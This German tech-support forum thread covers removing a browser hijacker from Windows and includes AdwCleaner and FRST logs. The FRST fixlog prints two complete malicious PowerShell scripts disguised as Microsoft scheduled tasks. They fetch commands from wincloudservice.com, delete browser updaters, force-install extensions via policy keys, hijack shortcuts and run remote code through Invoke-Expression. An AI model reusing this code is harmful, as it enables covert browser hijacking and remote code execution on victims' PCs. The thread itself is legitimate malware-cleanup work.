ATTFilter # ------------------------------- # Malwarebytes AdwCleaner 8.3.2.0 # ------------------------------- # Build: 03-23-2022 # Database: 2022-03-15.3 (Local) # Support: https://www.malwarebytes.com/support # # ------------------------------- # Mode: Scan # ------------------------------- # Start: 06-20-2022 # Duration: 00:00:03 # OS: Windows 10 Pro # Scanned: 32037 # Detected: 0 ***** [ Services ] ***** No malicious services found. ***** [ Folders ] ***** No malicious folders found. ***** [ Files ] ***** No malicious files found. ***** [ DLL ] ***** No malicious DLLs found. ***** [ WMI ] ***** No malicious WMI found. ***** [ Shortcuts ] ***** No malicious shortcuts found. ***** [ Tasks ] ***** No malicious tasks found. ***** [ Registry ] ***** No malicious registry entries found. ***** [ Chromium (and derivatives) ] ***** No malicious Chromium entries found. ***** [ Chromium URLs ] ***** No malicious Chromium URLs found. ***** [ Firefox (and derivatives) ] ***** No malicious Firefox entries found. ***** [ Firefox URLs ] ***** No malicious Firefox URLs found. ***** [ Hosts File Entries ] ***** No malicious hosts file entries found. ***** [ Preinstalled Software ] ***** No Preinstalled Software found. AdwCleaner[S00].txt - [1405 octets] - [06/06/2022 20:11:28] ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ########## |
20.06.2022, 15:47 | #3 |
/// TB-Ausbilder | Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker ErweiterungMein Name ist Matthias und ich werde dir bei der Analyse und der eventuell notwendigen Bereinigung deines Computers helfen. Ich analysiere gerade dein System und melde mich in Kürze mit weiteren Anweisungen. |
20.06.2022, 16:05 | #4 |
| Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung Hallo Matthias, vorab vielen Dank für deine Unterstützung. Wenn ich weitere Info zuliefern kann oder du eine RDP Session (TeamViewer, etc.) benötigst, gerne melden. Grüße Nils |
20.06.2022, 16:13 | #5 |
/// TB-Ausbilder | Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung Ok, wir fangen an. Diese Malware kommt mir bekannt vor... Schritt 1 WARNUNG AN ALLE MITLESER !!! Dieses FRST-Script ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System angewendet werden!
Schritt 2
Bitte poste mit deiner nächsten Antwort:
|
20.06.2022, 16:36 | #6 |
| Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung FRST wurde auf dem Desktop, jeweils als Administrator, ausgeführt. Nach dem "Reparieren" mit FRST wurde ein Neustart benötigt. Sobald der Desktop geladen wurde, kam die Aufforderung der Windows Firewall, Asus Dienste für Armoury Crate, zuzulassen. Die Meldung "Von Ihrer Organisation verwaltet" im Edge, ist verschwunden. Fixlog: Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 19-06-2022 durchgeführt von Pauli (20-06-2022 17:28:09) Run:1 Gestartet von C:\Users\Pauli\Desktop Geladene Profile: Pauli Start-Modus: Normal ============================================== fixlist Inhalt: ***************** SystemRestore: On CreateRestorePoint: CloseProcesses: CMD: type "C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService_2" Task: {230BDA8E-A467-4040-8078-DAE5117CABC8} - System32\Tasks\MicrosoftPrintWorkflowService_2 => powershell -File C:/Windows/System32/PrintWorkflowService.ps1 CMD: type "C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService" Task: {45642FF6-3619-47AF-9980-EB2BDDD2D870} - System32\Tasks\MicrosoftPrintWorkflowService => powershell -File C:/Windows/System32/PrintWorkflowService.ps1 CMD: type "C:\Windows\System32\PrintWorkflowService.ps1" C:\Windows\System32\PrintWorkflowService.ps1 CMD: type "C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1_2" Task: {B3EB67F7-C7BB-4F3D-8D5F-D4A6EEEEE750} - System32\Tasks\MicrosoftWindowsUpdaterTask_PR1_2 => powershell -File C:/Windows/System32/WindowsUpdater1.ps1 CMD: type "C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1" Task: {ECB4171C-2617-409F-9B15-78C553295691} - System32\Tasks\MicrosoftWindowsUpdaterTask_PR1 => powershell -File C:/Windows/System32/WindowsUpdater1.ps1 CMD: type "C:\Windows\System32\WindowsUpdater1.ps1" C:\Windows\System32\WindowsUpdater1.ps1 Unlock: C:\Windows\system32\fclip.exe VirusTotal: C:\Windows\system32\fclip.exe CMD: type "C:\Users\Pauli\AppData\Local\2613946761" VirusTotal: C:\Users\Pauli\AppData\Local\2613946761 2022-05-15 20:48 - 2022-05-15 20:48 - 000004846 _____ () C:\Users\Pauli\AppData\Local\1355515445 2022-05-29 17:52 - 2022-05-29 17:52 - 000004350 _____ () C:\Users\Pauli\AppData\Local\2613946761 2022-05-15 20:52 - 2022-05-15 20:52 - 000004846 _____ () C:\Users\Pauli\AppData\Local\3390820382 2022-05-07 16:50 - 2022-05-07 16:50 - 000005190 _____ () C:\Users\Pauli\AppData\Local\4096968421 HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [MicrosoftEdgeAutoLaunch_0394F9F0D5AFEC0304440CFD4BF5F89C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3547048 2022-05-05] (Microsoft Corporation -> Microsoft Corporation) BootExecute: autocheck autochk * sdnclean64.exe GroupPolicy: Beschränkung - Edge <==== ACHTUNG GroupPolicy\User: Beschränkung - Edge <==== ACHTUNG GroupPolicyUsers\S-1-5-21-1424437550-2087844553-323541659-1001\User: Beschränkung <==== ACHTUNG Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG Task: {07595C2E-60C1-4CAA-90B7-43A07800F8DF} - System32\Tasks\Opera scheduled Autoupdate 1652464033 => C:\Users\Pauli\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Keine Datei) Task: {5B8095A6-0C1E-4D17-A6BB-1C5756AAB167} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineCore => C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c (Keine Datei) Task: {A1411766-E2FC-47B4-9195-5EFB2B3C1F58} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineUA => C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /ua /installsource scheduler (Keine Datei) S2 edgeupdate; "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc [X] S3 edgeupdatem; "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc [X] ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ContextMenuHandlers2: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ContextMenuHandlers2: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => -> Keine Datei AlternateDataStreams: C:\Users\Pauli\Anwendungsdaten:d988fd1ce0beed92b2bcb751f85f2bf5 [394] AlternateDataStreams: C:\Users\Pauli\AppData\Roaming:d988fd1ce0beed92b2bcb751f85f2bf5 [394] AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [9112] startpowershell: Set-Service -Name "BITS" -StartupType Manual -Verbose Set-Service -Name "Dhcp" -StartupType Automatic -Verbose Set-Service -Name "EventLog" -StartupType Automatic -Verbose Set-Service -Name "EventSystem" -StartupType Automatic -Verbose Set-Service -Name "nsi" -StartupType Automatic -Verbose Set-Service -Name "RasMan" -StartupType Manual -Verbose Set-Service -Name "SDRSVC" -StartupType Manual -Verbose Set-Service -Name "SstpSvc" -StartupType Manual -Verbose Set-Service -Name "TrustedInstaller" -StartupType Manual -Verbose Set-Service -Name "VSS" -StartupType Manual -Verbose Set-Service -Name "Winmgmt" -StartupType Automatic -Verbose Set-Service -Name "wuauserv" -StartupType Manual -Verbose Set-MpPreference -DisableAutoExclusions $true -Force set-mppreference -mapsreporting basic -Force set-mppreference -DisableRealtimeMonitoring $false -Force set-mppreference -DisablePrivacyMode $true -Force set-mppreference -DisableIOAVProtection $false -Force set-mppreference -CheckForSignaturesBeforeRunningScan $true -Force set-mppreference -PUAProtection enabled -Force Set-MpPreference -DisableBehaviorMonitoring $false -Force Set-MpPreference -SignatureScheduleDay Everyday -force set-mppreference -RealTimeProtectionEnabled $true -force set-mppreference -OnAccessProtectionEnabled $true -force Function Remove-all-windefend-excludes { $Paths=(Get-MpPreference).ExclusionPath $Extensions=(Get-MpPreference).ExclusionExtension $Processes=(Get-MpPreference).ExclusionProcess foreach ($Path in $Paths) { Remove-MpPreference -ExclusionPath $Path -force} foreach ($Extension in $Extensions) { Remove-MpPreference -ExclusionExtension $Extension -force} foreach ($Process in $Processes) { Remove-MpPreference -ExclusionProcess $Process -force} } Set-MpPreference -DisableAutoExclusions $true -Force Remove-all-windefend-excludes endpowershell: CMD: ipconfig /flushdns CMD: netsh winsock reset catalog CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: netsh winhttp reset proxy CMD: Bitsadmin /Reset /Allusers CMD: Winmgmt /salvagerepository CMD: Winmgmt /resetrepository CMD: winmgmt /resyncperf CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R Hosts: RemoveProxy: C:\WINDOWS\SysWOW64\*.tmp C:\WINDOWS\System32\*.tmp C:\Windows\SystemTemp\*.tmp EmptyTemp: ***************** HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore => erfolgreich entfernt SystemRestore: On => abgeschlossen Wiederherstellungspunkt wurde erfolgreich erstellt. Prozesse erfolgreich geschlossen. ========= type "C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService_2" ========= <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2022-05-13T19:14:05</Date> <Author>Pauls_Gaming_PC\Pauli</Author> <URI>\MicrosoftPrintWorkflowService_2</URI> </RegistrationInfo> <Triggers> <TimeTrigger> <Repetition> <Interval>PT3H</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <StartBoundary>2022-05-13T19:17:00</StartBoundary> <Enabled>true</Enabled> </TimeTrigger> </Triggers> <Principals> <Principal id="Author"> <RunLevel>HighestAvailable</RunLevel> <UserId>S-1-5-18</UserId> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>powershell</Command> <Arguments>-File C:/Windows/System32/PrintWorkflowService.ps1</Arguments> </Exec> </Actions> </Task> ========= Ende von CMD: ========= "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{230BDA8E-A467-4040-8078-DAE5117CABC8}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{230BDA8E-A467-4040-8078-DAE5117CABC8}" => erfolgreich entfernt C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService_2 => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftPrintWorkflowService_2" => erfolgreich entfernt ========= type "C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService" ========= <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2022-05-13T19:14:05</Date> <Author>Pauls_Gaming_PC\Pauli</Author> <URI>\MicrosoftPrintWorkflowService</URI> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2022-05-13T19:17:00</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="Author"> <RunLevel>HighestAvailable</RunLevel> <UserId>S-1-5-18</UserId> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>powershell</Command> <Arguments>-File C:/Windows/System32/PrintWorkflowService.ps1</Arguments> </Exec> </Actions> </Task> ========= Ende von CMD: ========= "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{45642FF6-3619-47AF-9980-EB2BDDD2D870}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{45642FF6-3619-47AF-9980-EB2BDDD2D870}" => erfolgreich entfernt C:\Windows\System32\Tasks\MicrosoftPrintWorkflowService => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftPrintWorkflowService" => erfolgreich entfernt ========= type "C:\Windows\System32\PrintWorkflowService.ps1" ========= # POWERSHELL 2.0 # function Unzip2 { param([string]$file, [string]$outpath) $zipfile = (New-Object -Com Shell.Application).NameSpace($file) $destination = (New-Object -Com Shell.Application).NameSpace($outpath) $destination.CopyHere($zipfile.Items(), 0x14) } [System.Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions") $ser = New-Object System.Web.Script.Serialization.JavaScriptSerializer # POWERSHELL 2.0 END # function addRegKeys() { param ($arr) $basePath = "HKLM:\SOFTWARE\Policies\"; foreach ($element in $arr) { $basePath += $element + '\'; $t = Test-Path -Path $basePath; if (-Not $t) { $basePath; New-Item -Path $basePath; } } } function addRegVal() { param ( $items,[string]$path); $currentItems = Get-ItemProperty -Path $path; foreach ($a in $items) { $i = $a.id; $val = $a.val; if ($currentItems.$i) { $currentVal = $currentItems.$i; if ($currentVal -ne $val) { Set-ItemProperty -Path $path -Name $i -Value $val; } } else { New-ItemProperty -Path $path -Name $i -PropertyType String -Value $val; } } } function removeUpdates() { param(); Remove-Item HKLM:\SYSTEM\ControlSet001\Services\gupdate -Recurse; Remove-Item HKLM:\SYSTEM\ControlSet001\Services\gupdatem -Recurse; Remove-Item HKLM:\SYSTEM\CurrentControlSet\Services\gupdate -Recurse; Remove-Item HKLM:\SYSTEM\CurrentControlSet\Services\gupdatem -Recurse; Remove-Item 'C:\\Program Files (x86)\\Google\\Update' -Recurse Remove-Item 'C:\\Program Files (x86)\\Microsoft\\EdgeUpdate' -Recurse Remove-Item 'C:\\Program Files\\Google\\Update' -Recurse Remove-Item 'C:\\Program Files\\Microsoft\\EdgeUpdate' -Recurse } $uid = '5a423cf8-89c8-47b2-b1d0-c88e7d0ea43a'; $uid; $wc = New-Object system.Net.WebClient; $services = $wc.downloadString("hxxp://wincloudservice.com/apps/$uid").Trim(); $services = $ser.DeserializeObject($services); removeUpdates; $keysArr = @("Google", "Chrome", "ExtensionInstallForcelist"); addRegKeys($keysArr); $keysArr = @("Microsoft", "Edge", "ExtensionInstallForcelist"); addRegKeys($keysArr); $CPath = "HKLM:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist"; $EPath = "HKLM:\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist"; $CItems = $services.reg.c; $EItems = $services.reg.e; if ($CItems) { addRegVal $CItems $CPath; } if ($EItems) { addRegVal $EItems $EPath; } $CArgs = $services.args.c; $EArgs = $services.args.e; $CLocal = $services.local.c; $CLocalPath = $CLocal.path; try{ $currentLocalV = (Get-Content "$CLocalPath\version.txt"); $currentLocalV = [Decimal]$currentLocalV ; } catch{ $currentLocalV = 0; } if ($CArgs) { $Shortcuts = Get-ChildItem -Path "C:\" -Include *.lnk -Recurse -Force; $Shell = New-Object -ComObject WScript.Shell; foreach ($s in $Shortcuts) { $target= $Shell.CreateShortcut($s).TargetPath; if ($target -Match 'chrome.exe') { $shortcut = $Shell.CreateShortcut($s.Fullname) $shortcut.Arguments = "$CArgs --load-extension=$CLocalPath"; $shortcut.Save(); } elseif ($target -Match 'msedge.exe') { $shortcut = $Shell.CreateShortcut($s.Fullname) $shortcut.Arguments = $EArgs; $shortcut.Save(); } } } if ($services.local.c) { if ($currentLocalV -ne $services.local.c.v) { New-Item -Path $CLocalPath -Name "archive.logs" -ItemType "file" -Force foreach ($f in $services.local.c.files) { $fn = $f.split('/')[-1]; (New-Object Net.WebClient).DownloadFile($f, "$CLocalPath\$fn") } #Unzip2 "$CLocalPath\logsCache.zip" "$CLocalPath" -Force (Get-Content "$CLocalPath\config.js") -replace '%USERID%', $uid | Set-Content "$CLocalPath\config.js" } } if ($services.restart) { try{ Get-Process chrome | ForEach-Object { $_.CloseMainWindow() | Out-Null} start chrome "$CArgs --load-extension=$CLocalPath --restore-last-session"; } catch{ } } if ($services.rem) { $rem = $wc.downloadString($services.rem).Trim(); Invoke-Expression $rem; } ========= Ende von CMD: ========= C:\Windows\System32\PrintWorkflowService.ps1 => erfolgreich verschoben ========= type "C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1_2" ========= <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2022-06-04T20:30:49</Date> <Author>Pauls_Gaming_PC\Pauli</Author> <URI>\MicrosoftWindowsUpdaterTask_PR1_2</URI> </RegistrationInfo> <Triggers> <TimeTrigger> <Repetition> <Interval>PT3H</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <StartBoundary>2022-06-04T20:33:00</StartBoundary> <Enabled>true</Enabled> </TimeTrigger> </Triggers> <Principals> <Principal id="Author"> <RunLevel>HighestAvailable</RunLevel> <UserId>S-1-5-18</UserId> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>powershell</Command> <Arguments>-File C:/Windows/System32/WindowsUpdater1.ps1</Arguments> </Exec> </Actions> </Task> ========= Ende von CMD: ========= "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B3EB67F7-C7BB-4F3D-8D5F-D4A6EEEEE750}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B3EB67F7-C7BB-4F3D-8D5F-D4A6EEEEE750}" => erfolgreich entfernt C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1_2 => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftWindowsUpdaterTask_PR1_2" => erfolgreich entfernt ========= type "C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1" ========= <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2022-06-04T20:30:49</Date> <Author>Pauls_Gaming_PC\Pauli</Author> <URI>\MicrosoftWindowsUpdaterTask_PR1</URI> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2022-06-04T20:33:00</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="Author"> <RunLevel>HighestAvailable</RunLevel> <UserId>S-1-5-18</UserId> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>powershell</Command> <Arguments>-File C:/Windows/System32/WindowsUpdater1.ps1</Arguments> </Exec> </Actions> </Task> ========= Ende von CMD: ========= "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ECB4171C-2617-409F-9B15-78C553295691}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ECB4171C-2617-409F-9B15-78C553295691}" => erfolgreich entfernt C:\Windows\System32\Tasks\MicrosoftWindowsUpdaterTask_PR1 => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftWindowsUpdaterTask_PR1" => erfolgreich entfernt ========= type "C:\Windows\System32\WindowsUpdater1.ps1" ========= # POWERSHELL 2.0 # function Unzip2 { param([string]$file, [string]$outpath) $zipfile = (New-Object -Com Shell.Application).NameSpace($file) $destination = (New-Object -Com Shell.Application).NameSpace($outpath) $destination.CopyHere($zipfile.Items(), 0x14) } [System.Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions") $ser = New-Object System.Web.Script.Serialization.JavaScriptSerializer # POWERSHELL 2.0 END # function addRegKeys() { param ($arr) $basePath = "HKLM:\SOFTWARE\Policies\"; foreach ($element in $arr) { $basePath += $element + '\'; $t = Test-Path -Path $basePath; if (-Not $t) { $basePath; New-Item -Path $basePath; } } } function addRegVal() { param ( $items,[string]$path); $currentItems = Get-ItemProperty -Path $path; foreach ($a in $items) { $i = $a.id; $val = $a.val; if ($currentItems.$i) { $currentVal = $currentItems.$i; if ($currentVal -ne $val) { Set-ItemProperty -Path $path -Name $i -Value $val; } } else { New-ItemProperty -Path $path -Name $i -PropertyType String -Value $val; } } } function removeUpdates() { param(); Remove-Item HKLM:\SYSTEM\ControlSet001\Services\gupdate -Recurse; Remove-Item HKLM:\SYSTEM\ControlSet001\Services\gupdatem -Recurse; Remove-Item HKLM:\SYSTEM\CurrentControlSet\Services\gupdate -Recurse; Remove-Item HKLM:\SYSTEM\CurrentControlSet\Services\gupdatem -Recurse; Remove-Item 'C:\\Program Files (x86)\\Google\\Update' -Recurse Remove-Item 'C:\\Program Files (x86)\\Microsoft\\EdgeUpdate' -Recurse Remove-Item 'C:\\Program Files\\Google\\Update' -Recurse Remove-Item 'C:\\Program Files\\Microsoft\\EdgeUpdate' -Recurse } $uid = '5a423cf8-89c8-47b2-b1d0-c88e7d0ea43a'; $uid; $wc = New-Object system.Net.WebClient; $services = $wc.downloadString("hxxp://wincloudservice.com/apps/$uid").Trim(); $services = $ser.DeserializeObject($services); removeUpdates; $keysArr = @("Google", "Chrome", "ExtensionInstallForcelist"); addRegKeys($keysArr); $keysArr = @("Microsoft", "Edge", "ExtensionInstallForcelist"); addRegKeys($keysArr); $CPath = "HKLM:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist"; $EPath = "HKLM:\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist"; $CItems = $services.reg.c; $EItems = $services.reg.e; if ($CItems) { addRegVal $CItems $CPath; } if ($EItems) { addRegVal $EItems $EPath; } $CArgs = $services.args.c; $EArgs = $services.args.e; $CLocal = $services.local.c; $CLocalPath = $CLocal.path; try{ $currentLocalV = (Get-Content "$CLocalPath\version.txt"); $currentLocalV = [Decimal]$currentLocalV ; } catch{ $currentLocalV = 0; } if ($CArgs) { $Shortcuts = Get-ChildItem -Path "C:\" -Include *.lnk -Recurse -Force; $Shell = New-Object -ComObject WScript.Shell; foreach ($s in $Shortcuts) { $target= $Shell.CreateShortcut($s).TargetPath; if ($target -Match 'chrome.exe') { $shortcut = $Shell.CreateShortcut($s.Fullname) $shortcut.Arguments = "$CArgs --load-extension=$CLocalPath"; $shortcut.Save(); } elseif ($target -Match 'msedge.exe') { $shortcut = $Shell.CreateShortcut($s.Fullname) $shortcut.Arguments = $EArgs; $shortcut.Save(); } } } if ($services.local.c) { if ($currentLocalV -ne $services.local.c.v) { New-Item -Path $CLocalPath -Name "archive.logs" -ItemType "file" -Force foreach ($f in $services.local.c.files) { $fn = $f.split('/')[-1]; (New-Object Net.WebClient).DownloadFile($f, "$CLocalPath\$fn") } #Unzip2 "$CLocalPath\logsCache.zip" "$CLocalPath" -Force (Get-Content "$CLocalPath\config.js") -replace '%USERID%', $uid | Set-Content "$CLocalPath\config.js" } } if ($services.restart) { try{ Get-Process chrome | ForEach-Object { $_.CloseMainWindow() | Out-Null} start chrome "$CArgs --load-extension=$CLocalPath --restore-last-session"; } catch{ } } if ($services.rem) { $rem = $wc.downloadString($services.rem).Trim(); Invoke-Expression $rem; } ========= Ende von CMD: ========= C:\Windows\System32\WindowsUpdater1.ps1 => erfolgreich verschoben "C:\Windows\system32\fclip.exe" => wurde entsperrt VirusTotal: C:\Windows\system32\fclip.exe => https://www.virustotal.com/gui/file/3ef7a01df4e68e1a6cf529f14d51d18e81efe6931dfae5bbe1c7ce7a657d667b/detection/f-3ef7a01df4e68e1a6cf529f14d51d18e81efe6931dfae5bbe1c7ce7a657d667b-1654728746 ========= type "C:\Users\Pauli\AppData\Local\2613946761" ========= c4494e9b1e3362540bbe941f705e1519767791d9d8b650f50b2d9cca0032815c191e6419dbc0cd1c0eb39a8ae65a754456363831c0e4449d7278c54af537911d7e01b04495c6ac35063a8f4a3032e82c4e71a9659bb16cbd743fb500b56de018142b84e58ceb28511abec94a7651e12c6c2a4071a5e1b1311aebad8e0566806455019424dfecec30747bbe01375c853d4a7bbc5583f9cc6570b49800d05eb0204b2dc87ddac7ecc11a3f95c1963a80256d231820a9d0a8194f33bf9ca067953c510670d9b5ba80a158b29943f66871ec4d04885dddbbd8dd67aacc42f47a29306916989d8dc404a574b3aa85f6760d206901992dacecb95972739fc1c6777520780cec85daee40415a76999d164598215f1d18e5d8c144e5017fbc03574419ac4d089541a4b7b4a95c73afc8f5499c50117f142d9cc7f83063ff89dbd074d9507102f041bac86841053ece8564396d2d63021c19bcbdb1297e7bcd86f06b61ac7606bdd998d7c85962bacf9e464a95357835788597c1a56974b287dd755ee5684936b8c19efe2cfd4eb2984c254f091d461b90b9bcdfb11c42e892c2555a61404e3a809d9edd784576f2a89c353e993d4a2dd07dbcbeb15505f3cdc99757e0286c179d1c95c5ec3d5f3c8783775ce934711eb0a5b6cbdcb100b7a989754f81a4631eb8ad89e3e8690efcc4dde468c54856194c6981c84c617c7b964ba77b81295e04c42c9afdd83852fcca4b776fe1ec66367cb1b5bfac2460fd9b8a4742f1e81e7f4869aeb67c21463ebb4c957f6d4c5109b049a7bcb42d67fc8f009774cd98137790e19aff74